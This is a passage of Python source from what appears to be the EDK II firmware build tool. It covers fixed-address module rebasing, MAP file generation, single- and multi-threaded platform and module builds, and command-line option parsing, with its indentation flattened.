# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
            # Add GUID and general section information.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
            # Add function addresses
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict.keys():
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
                # skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid != None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid != None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
        # reserve 4K in SMRAM so that SMM module addresses do not start at 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in ['PEI_CORE', 'PEIM', 'COMBINED_PEIM_DRIVER', 'PIC_PEIM', 'RELOCATABLE_PEIM', 'DXE_CORE']:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in ['BS_DRIVER', 'DXE_DRIVER', 'UEFI_DRIVER']:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['DXE_RUNTIME_DRIVER', 'RT_DRIVER', 'DXE_SAL_DRIVER', 'SAL_RT_DRIVER']:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['SMM_CORE', 'DXE_SMM_DRIVER', 'MM_STANDALONE', 'MM_CORE_STANDALONE']:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == 'DXE_SMM_DRIVER':
PiSpecVersion = '0x00000000'
if 'PI_SPECIFICATION_VERSION' in Module.Module.Specification:
PiSpecVersion = Module.Module.Specification['PI_SPECIFICATION_VERSION']
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize / 0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize / 0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize / 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize / 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
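        # Resulting layout (from TopMemoryAddress downward): runtime drivers at the top,
        # boot-time drivers below them, then PEI images; SMM modules are rebased
        # separately, starting at offset 0x1000 within SMRAM.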
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
        # Determine the map file path.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
self.Progress.Stop("done!")
MaList = []
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.File == Module.File:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None: continue
MaList.append(Ma)
self.BuildModules.append(Ma)
if not Ma.IsBinaryModule:
self._Build(self.Target, Ma, BuildModule=True)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
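                # Scheduling flow below: queue one ModuleMakeUnit task per module via
                # BuildTask.New(), start the scheduler once, then set ExitFlag and wait
                # for completion after every module has been queued.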
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa == None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser != None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
                    # Do not run AutoGen for the targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # in case there's an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
            # All modules have been put into the build task queue. Tell the task
            # scheduler to exit once all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print >> toolsFile, ' '.join(guidedSectionTool)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
self.BuildModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache == None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase == None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList != None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
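# Example (illustrative): ParseDefines(["FOO=1", "BAR"]) returns
# {'FOO': '1', 'BAR': 'TRUE'}, assuming both names match gMacroNamePattern.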
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. Less than 2 will disable multi-thread builds.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS','HASH','EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
